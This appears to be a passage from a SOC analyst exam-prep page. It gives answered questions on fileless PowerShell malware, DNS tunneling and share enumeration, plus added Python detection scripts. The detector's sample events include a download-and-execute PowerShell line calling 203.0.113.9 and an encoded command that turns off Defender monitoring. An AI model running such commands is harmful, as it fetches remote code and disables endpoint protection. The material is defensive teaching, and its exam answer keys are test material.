Option B is correct. Fileless malware often uses PowerShell to execute in memory, maintain persistence, disable antivirus, and download additional payloads from untrusted sources. Indicators include off-hours execution, creation of scheduled tasks, obfuscation, and multi-endpoint compromise. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and analyzing scripts to understand persistence mechanisms, payloads, and command-and-control communication. Network traffic analysis can identify attacker infrastructure, and threat intelligence can provide context on known malware. Remediation includes cleaning infected endpoints, restoring security functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence supports regulatory compliance and post-incident analysis. Failing to respond could allow malware to maintain persistent access and exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically are limited in scope and do not involve obfuscation, antivirus disabling, or payload downloading. Treating this as benign could allow malware to persist and propagate.
Option D assumes that unusual system activity is the result of legitimate user testing. In most IT and development environments, testing activities are structured, scheduled, and well-documented. These tests typically follow defined procedures, involve specific endpoints or applications, and operate within controlled parameters. Documentation ensures that testing can be distinguished from anomalous or malicious activity and that administrators are aware of when and where tests will occur. Predictable behavior, such as execution at scheduled times and expected outputs, is a key characteristic of legitimate testing.
However, the scenario described—activity occurring off-hours, involving security bypass, and affecting multiple endpoints—does not align with standard testing practices. Legitimate testing rarely requires disabling security controls, modifying logs, or deploying obfuscated scripts to avoid detection. Such behavior is indicative of deliberate attempts to conceal activity, maintain persistence, or evade monitoring. Multi-endpoint compromise further amplifies the concern, as routine tests are usually isolated to specific systems rather than impacting a broad range of devices across the network.
Treating this type of activity as benign testing introduces substantial risk. Malicious actors often mimic legitimate operations to avoid detection, performing actions during low-monitoring periods and using techniques that appear operationally similar to administrative tasks. If off-hours execution, security bypass, and widespread endpoint impact are misclassified as testing, malware may persist undetected, exfiltrate data, escalate privileges, or propagate laterally.
Proper response requires verification and investigation. Security teams must review logs, correlate activity with documented testing schedules, and analyze affected endpoints. Any activity inconsistent with approved testing procedures should be treated as suspicious and investigated thoroughly. In conclusion, off-hours execution, bypass of security controls, and multi-endpoint impact are inconsistent with legitimate testing, and assuming otherwise risks ongoing compromise and significant security exposure.
Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing persistent malware operations and safeguarding sensitive systems.
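The behaviours the explanation above lists (obfuscation, scheduled-task creation, antivirus tampering, payload download from external IPs) are what a script-block logging rule looks for. The following is an added example, not part of the exam material, that scores PowerShell script-block text against a small set of indicator patterns and decodes `-EncodedCommand` arguments so the body behind the encoding is scanned too. The events are constructed (one of them is built at runtime by encoding a plain `Set-MpPreference` call), and the indicator list is illustrative rather than any vendor's rule set.

```python
"""Indicator scoring for PowerShell script-block log entries.

Added example (not from the exam page): pattern-matches the behaviours the
question lists (obfuscation via encoded commands, antivirus tampering,
scheduled-task persistence, payload download from raw IPs, hidden execution)
and rescans the decoded body of -EncodedCommand payloads. Sample events are
constructed; the indicator list is illustrative, not a vendor rule set.
"""
import base64
import re

INDICATORS = {
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
    "av_tamper": re.compile(
        r"Set-MpPreference\s+-Disable\w+|Stop-Service\s+\S*(?:Defend|Sense)", re.I),
    "scheduled_task": re.compile(
        r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I),
    "remote_payload": re.compile(
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)"
        r".*?https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
    "hidden_execution": re.compile(
        r"-(?:w|win|windowstyle)\s+hidden|\bIEX\b|Invoke-Expression", re.I),
}


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or None."""
    m = INDICATORS["encoded_command"].search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Return {'indicators': [...], 'score': n, 'decoded': str|None} for one script block."""
    decoded = decode_encoded_command(text)
    hits = set()
    # Scan the raw block and, when present, the decoded payload with the same patterns.
    for body in (text, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(body):
                hits.add(name)
    return {"indicators": sorted(hits), "score": len(hits), "decoded": decoded}


def triage(events, threshold=2):
    """Flag (host, time, block) events whose indicator count reaches the threshold."""
    findings = []
    for host, ts, block in events:
        result = score_script_block(block)
        if result["score"] >= threshold:
            findings.append({"host": host, "time": ts, **result})
    return findings


# Constructed script-block text in the shape of Event ID 4104 entries. The encoded
# payload is built here from a plain Set-MpPreference call so the decode path has
# something to find.
ENCODED = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("ws-104", "2024-03-10T01:14:22",
     f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ("ws-212", "2024-03-10T01:15:03",
     "Register-ScheduledTask -TaskName Updater -Action (New-ScheduledTaskAction "
     "-Execute powershell.exe -Argument 'IEX (New-Object Net.WebClient)"
     ".DownloadString(\"http://203.0.113.9/a\")')"),
    ("ws-311", "2024-03-10T09:30:00",
     "Get-Service | Where-Object Status -eq Running | Export-Csv C:\\reports\\services.csv"),
    ("ws-311", "2024-03-10T09:31:00",
     "Register-ScheduledTask -TaskName LogRotate -Action "
     "(New-ScheduledTaskAction -Execute 'C:\\Tools\\rotate.ps1')"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['host']} {f['time']} score={f['score']} {f['indicators']}")
```

The threshold of two indicators keeps a lone administrative `Register-ScheduledTask` below the alert line while the two off-hours events, each combining persistence or evasion with a second behaviour, are flagged. Decoding the encoded command is what turns the first event from "someone used `-enc`" into "antivirus real-time monitoring was being switched off", which is the detail the forensic analysis in the explanation is after.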
Question 119
A SOC analyst notices endpoints generating repeated DNS queries to newly registered domains with high-entropy subdomains. The queries are low-volume, highly frequent, and occur outside business hours. What is the most likely threat, and what should the SOC do first?
A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Legitimate DNS queries involve known domains with predictable subdomains. Frequent, low-volume, off-hours queries to newly registered domains with high-entropy subdomains indicate anomalous activity. Ignoring this could allow malware to exfiltrate data or maintain covert command-and-control channels undetected. Normal DNS resolution is predictable and does not involve dynamically generated subdomains or off-hours persistent activity.
Option B is correct. DNS tunneling encodes data within DNS queries to bypass network controls. Key indicators include high-frequency queries, off-hours timing, low volume, and communication with newly registered domains using high-entropy subdomains. Immediate SOC response involves capturing DNS traffic to decode exfiltrated data, isolating affected hosts to prevent further leakage, and performing endpoint forensics to identify responsible processes. Threat intelligence can help identify external attacker infrastructure. Remediation includes cleaning endpoints, updating detection rules to recognize DNS tunneling patterns, and monitoring for similar activity. Preserving evidence supports regulatory compliance, forensic investigation, and improvement of threat detection. Ignoring this activity risks sustained data exfiltration, persistent malware presence, and operational compromise.
Option C suggests that anomalous DNS activity could be attributed to misconfigured DNS servers. DNS misconfigurations are relatively common in enterprise networks and can lead to observable errors, such as failed domain resolutions, repeated queries to unreachable addresses, or misrouted requests. For example, incorrect forwarding rules, stale cache entries, or improperly configured zones can trigger error logs and generate repeat query attempts. These issues are generally predictable, easily traceable, and limited to authorized domains or internal resources. Administrators can usually identify the misconfigured server, diagnose the root cause, and correct the configuration without widespread disruption.
However, the scenario described—persistent queries with high-entropy subdomains—is inconsistent with the behavior caused by typical DNS misconfigurations. High-entropy subdomains, which contain seemingly random strings or encoded data, are rarely the result of accidental configuration errors. Instead, they are commonly associated with malicious activity, such as malware communication, data exfiltration, or command-and-control operations. Malware often uses DNS because it is a ubiquitous protocol, and its traffic is usually allowed through firewalls and monitoring tools. By encoding information in subdomains, attackers can transmit data covertly or maintain persistent communication with external servers while minimizing detection.
Treating this activity as benign is risky. Misclassifying high-entropy DNS queries as simple misconfiguration allows malware to maintain a foothold within the network undetected. Persistent queries directed at external domains, especially those that are recently registered or dynamically generated, are hallmarks of malware attempting to evade security measures. If left uninvestigated, this activity can facilitate ongoing exfiltration of sensitive data, remote control of compromised hosts, and lateral movement to other systems, substantially increasing the impact of a security breach.
Proper security response requires verification and analysis rather than assumption. Security teams should examine DNS query patterns, identify high-entropy subdomains, and correlate them with endpoint activity and network logs. Investigating the timing, frequency, and target domains of these queries is essential to differentiate between legitimate anomalies and malicious behavior. Memory and process forensics may also help identify the presence of malware or unauthorized scripts generating these queries.
While misconfigured DNS servers can produce errors and predictable resolution issues, they do not generate persistent queries with high-entropy subdomains. Such activity is highly indicative of malicious intent rather than benign misconfiguration. Treating these queries as routine or harmless can leave malware operational, enabling covert communication, data exfiltration, and continued compromise of organizational systems. Effective detection, verification, and remediation are critical to identifying unauthorized activity, protecting sensitive data, and ensuring the integrity of network operations.
Option D assumes antivirus telemetry. Telemetry is sent to known domains on a predictable schedule. Off-hours, high-frequency, high-entropy queries are inconsistent with standard antivirus activity.
Selecting option B ensures containment, forensic analysis, and remediation while protecting sensitive data and maintaining network integrity.
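The explanation above repeatedly points to high-entropy subdomains, newly registered domains and off-hours timing as the discriminators between misconfiguration and tunneling. The following is an added example, not part of the exam material, that computes the Shannon entropy of the leftmost label of each queried name, groups queries by registered domain, and flags domains receiving several distinct high-entropy labels. The resolver log lines, the domain allowlist and the domain-age lookup are constructed; a real deployment would take domain age from a WHOIS or passive-DNS feed and would split registered domains with the public suffix list rather than the naive last-two-labels rule used here.

```python
"""Entropy-based DNS tunneling triage over resolver query logs.

Added example (not from the exam page): computes Shannon entropy of the
leftmost label of each queried name, groups queries by registered domain and
flags domains that receive many distinct high-entropy subdomains, mostly
off-hours. The log lines, allowlist and domain-age lookup are constructed.
"""
import math
from collections import Counter, defaultdict
from datetime import datetime

BUSINESS_HOURS = range(8, 18)
# Hypothetical allowlist of domains with documented business use.
ALLOWLISTED_DOMAINS = {"example-corp.com", "static-vendor.net"}
# Hypothetical domain-age feed (days since registration); a missing entry means unknown.
DOMAIN_AGE_DAYS = {"cdn-sync.example": 6, "example-corp.com": 4100, "static-vendor.net": 2300}

# Constructed resolver log: "<timestamp> <client_ip> <qname> <qtype>".
SAMPLE_DNS_LOG = """\
2024-03-10T01:12:03 10.0.0.5 k3x9q7v2m8z4w1r6t0p5.cdn-sync.example TXT
2024-03-10T01:12:09 10.0.0.5 b7n2h9c4j1d6l8f3s0g5.cdn-sync.example TXT
2024-03-10T01:12:15 10.0.0.5 y2e8u4o0i6a1w5q9r3t7.cdn-sync.example TXT
2024-03-10T01:12:21 10.0.0.5 p4m1v7c3x8z5k0n9h2l6.cdn-sync.example TXT
2024-03-10T09:00:01 10.0.0.7 www.example-corp.com A
2024-03-10T09:00:02 10.0.0.7 mail.example-corp.com A
2024-03-10T09:05:10 10.0.0.7 cdn.static-vendor.net A
2024-03-10T09:05:11 10.0.0.7 api-east.static-vendor.net A
2024-03-10T14:22:40 10.0.0.9 www.example-corp.com A
"""


def shannon_entropy(label):
    """Bits of entropy per character of a DNS label (0.0 for an empty or single-symbol label)."""
    if not label:
        return 0.0
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Split each log line into its fields and derive the registered domain and leftmost label."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        labels = qname.rstrip(".").split(".")
        # Naive registered-domain split (last two labels); a real tool uses the public suffix list.
        records.append({"time": datetime.fromisoformat(ts), "client": client, "qname": qname,
                        "qtype": qtype, "domain": ".".join(labels[-2:]), "label": labels[0]})
    return records


def analyze(text, min_entropy=3.5, min_distinct=3, max_age_days=30):
    """Return one finding per non-allowlisted domain with >= min_distinct high-entropy labels."""
    by_domain = defaultdict(list)
    for r in parse_log(text):
        by_domain[r["domain"]].append(r)

    findings = []
    for domain, recs in by_domain.items():
        if domain in ALLOWLISTED_DOMAINS:
            continue
        high = {r["label"] for r in recs if shannon_entropy(r["label"]) >= min_entropy}
        if len(high) < min_distinct:
            continue
        off_hours = sum(r["time"].hour not in BUSINESS_HOURS for r in recs) / len(recs)
        age = DOMAIN_AGE_DAYS.get(domain)
        findings.append({"domain": domain, "queries": len(recs),
                         "distinct_high_entropy": len(high),
                         "mean_entropy": round(sum(shannon_entropy(l) for l in high) / len(high), 2),
                         "off_hours_share": round(off_hours, 2),
                         "newly_registered": age is not None and age <= max_age_days,
                         "clients": sorted({r["client"] for r in recs}),
                         "qtypes": sorted({r["qtype"] for r in recs})})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_DNS_LOG):
        print(f"{f['domain']}: {f['distinct_high_entropy']} high-entropy labels, "
              f"mean entropy {f['mean_entropy']}, off-hours {f['off_hours_share']:.0%}, "
              f"new={f['newly_registered']}, clients={f['clients']}")
```

Ordinary hostnames such as `www`, `mail` or `api-east` sit well under 3.5 bits per character, while the constructed 20-character labels, built from distinct characters, score about 4.32 bits each. The finding also records the query types and the client list, which is what the explanation's next step, tying the queries back to a process on the endpoint, starts from.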
Question 120
A SOC analyst observes endpoints attempting repeated unauthorized access to sensitive file shares outside business hours. The attempts are executed by unknown processes, and several accounts are affected across multiple systems. What is the most likely threat, and what is the immediate SOC response?
A) Normal backup activity; allow access.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups involve predictable schedules, authorized accounts, and full file access. Partial access attempts to rarely used shares by unknown processes outside business hours are anomalous. Ignoring this could allow malware to map the network, exfiltrate sensitive information, or spread laterally.
Option B is correct. Malware frequently probes network shares to perform reconnaissance and lateral movement. Indicators include off-hours activity, multi-system targeting, repeated unauthorized access, and unknown process execution. Immediate SOC response involves isolating affected endpoints, reviewing access logs to determine the scope of attempts, performing endpoint forensics to identify responsible malware or processes, and correlating activity with SIEM data to identify affected accounts. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, incident analysis, and improved detection of similar threats. Ignoring this activity allows malware to persist, gather credentials, and potentially exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically affect a limited scope and do not explain multi-system unauthorized access attempts. Treating this as benign risks an ongoing compromise.
Option D assumes that unusual activity occurring during off-hours is legitimate user activity. In enterprise environments, off-hours activity does occur, such as automated backups, scheduled maintenance, or occasional system updates. However, normal user behavior rarely involves attempting unauthorized access to multiple rarely used shares during these periods. Typical off-hours operations are predictable, documented, and limited to specific systems and processes. When users access multiple rarely used or restricted resources, particularly outside normal working hours, it represents a deviation from expected behavior and should be treated as a potential security concern rather than a routine activity.
Malware and malicious actors often exploit off-hours periods because monitoring and oversight are reduced during nights, weekends, and holidays. During these windows, attackers can conduct reconnaissance, move laterally across the network, escalate privileges, or exfiltrate sensitive data with a lower likelihood of detection. Attempting access to multiple rarely used shares may indicate that malware is mapping the network to identify valuable targets or gathering information to maintain persistence and propagate further. Unauthorized access combined with off-hours activity is therefore a strong indicator of malicious behavior, rather than routine user operations.
Misclassifying this behavior as benign carries significant risk. If security teams dismiss such anomalies as normal off-hours activity, malware may continue operating undetected. Persistent threats can maintain a foothold in the network, exfiltrate confidential data, modify system configurations, or escalate privileges, increasing both the scope and impact of a compromise. In addition, ignoring off-hours anomalies undermines security governance and reduces the ability to respond proactively, leaving organizations vulnerable to prolonged exposure.
Proper security response requires careful investigation and verification. Security teams should analyze access logs to determine which resources were accessed, assess permissions to identify unauthorized activity, and correlate off-hours activity with known operational schedules. Behavioral baselines and anomaly detection tools can help distinguish between legitimate maintenance tasks and suspicious behavior. Forensic analysis may also include examining endpoint processes, network traffic, and system changes to determine whether observed activity is consistent with known malicious techniques, such as lateral movement or data exfiltration.
Assuming that off-hours access to multiple rarely used shares is legitimate is a high-risk approach. Normal users rarely attempt unauthorized access, and malware frequently exploits off-hours periods to conduct reconnaissance, maintain persistence, and move laterally within the network. Misclassifying such activity as benign can allow persistent malware operations to continue, exposing sensitive data and increasing the potential impact of a compromise. Verification, monitoring, and careful analysis of off-hours anomalies are essential to differentiate between legitimate operations and malicious activity, enabling timely containment, mitigation, and protection of organizational assets.
Selecting option B ensures early detection, containment, and remediation, protecting sensitive systems and preventing further lateral movement.
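The log review the explanation above describes, reviewing access logs for scope, identifying the responsible process and correlating across accounts and systems, can be expressed as a simple aggregation. The following is an added example, not part of the exam material, that walks constructed share-access events (the fields mirror what a Windows 5145 "network share object was checked" event carries), aggregates denied attempts per account, and flags accounts whose off-hours denials from an undocumented process spread across several shares or several source hosts. The process allowlist, hostnames, accounts, share paths and timestamps are all constructed.

```python
"""Correlating off-hours share-access denials across hosts and accounts.

Added example (not from the exam page): aggregates constructed share-access
events per account and flags the enumeration shape the question describes:
denied, off-hours attempts from an undocumented process that span several
shares or several source hosts. Allowlist and events are constructed.
"""
from collections import defaultdict
from datetime import datetime

BUSINESS_HOURS = range(8, 18)
# Hypothetical inventory of processes expected to touch file shares.
DOCUMENTED_PROCESSES = {"backupagent.exe", "explorer.exe"}

# Constructed events: (timestamp, source_host, account, process, share, outcome).
SAMPLE_EVENTS = [
    ("2024-03-10T23:00:10", "fs-bak-01", "svc-backup", "backupagent.exe", r"\\fs01\Finance", "ALLOWED"),
    ("2024-03-10T23:00:12", "fs-bak-01", "svc-backup", "backupagent.exe", r"\\fs01\HR", "ALLOWED"),
    ("2024-03-11T02:14:03", "ws-104", "jdoe", "svchost32.tmp", r"\\fs01\HR", "DENIED"),
    ("2024-03-11T02:14:05", "ws-104", "jdoe", "svchost32.tmp", r"\\fs01\Legal", "DENIED"),
    ("2024-03-11T02:14:08", "ws-104", "jdoe", "svchost32.tmp", r"\\fs02\Finance", "DENIED"),
    ("2024-03-11T02:21:40", "ws-212", "jdoe", "svchost32.tmp", r"\\fs02\Finance", "DENIED"),
    ("2024-03-11T02:21:42", "ws-212", "jdoe", "svchost32.tmp", r"\\fs02\Exec", "DENIED"),
    ("2024-03-11T10:05:00", "ws-311", "mpatel", "explorer.exe", r"\\fs01\Shared", "DENIED"),
    ("2024-03-11T10:05:30", "ws-311", "mpatel", "explorer.exe", r"\\fs01\Shared", "ALLOWED"),
]


def correlate(events, min_shares=3, min_hosts=2, off_hours_share=0.5):
    """Return one finding per account whose denied attempts look like share enumeration."""
    acc = defaultdict(lambda: {"hosts": set(), "shares": set(), "procs": set(),
                               "denied": 0, "denied_off_hours": 0})
    for ts, host, account, proc, share, outcome in events:
        if outcome != "DENIED":
            continue  # allowed access is judged elsewhere; here we want the probing pattern
        a = acc[account]
        a["denied"] += 1
        a["hosts"].add(host)
        a["shares"].add(share)
        a["procs"].add(proc)
        if datetime.fromisoformat(ts).hour not in BUSINESS_HOURS:
            a["denied_off_hours"] += 1

    findings = []
    for account, a in acc.items():
        # Breadth: many distinct shares, or the same account probing from several hosts.
        spread = len(a["shares"]) >= min_shares or len(a["hosts"]) >= min_hosts
        mostly_off_hours = a["denied_off_hours"] / a["denied"] >= off_hours_share
        unknown_procs = sorted(a["procs"] - DOCUMENTED_PROCESSES)
        if spread and mostly_off_hours and unknown_procs:
            findings.append({"account": account, "denied": a["denied"],
                             "hosts": sorted(a["hosts"]), "shares": sorted(a["shares"]),
                             "unknown_processes": unknown_procs})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['account']}: {f['denied']} denials from {f['hosts']} "
              f"against {len(f['shares'])} shares via {f['unknown_processes']}")
```

The backup service account's off-hours reads are allowed and come from a documented process, so they never enter the aggregation, and a single daytime denial from Explorer is not breadth. The account seen failing against four shares from two workstations through an undocumented binary is the one the explanation's "isolate, review logs, analyze endpoints" response should start with, and the finding lists both hosts so containment covers all of them.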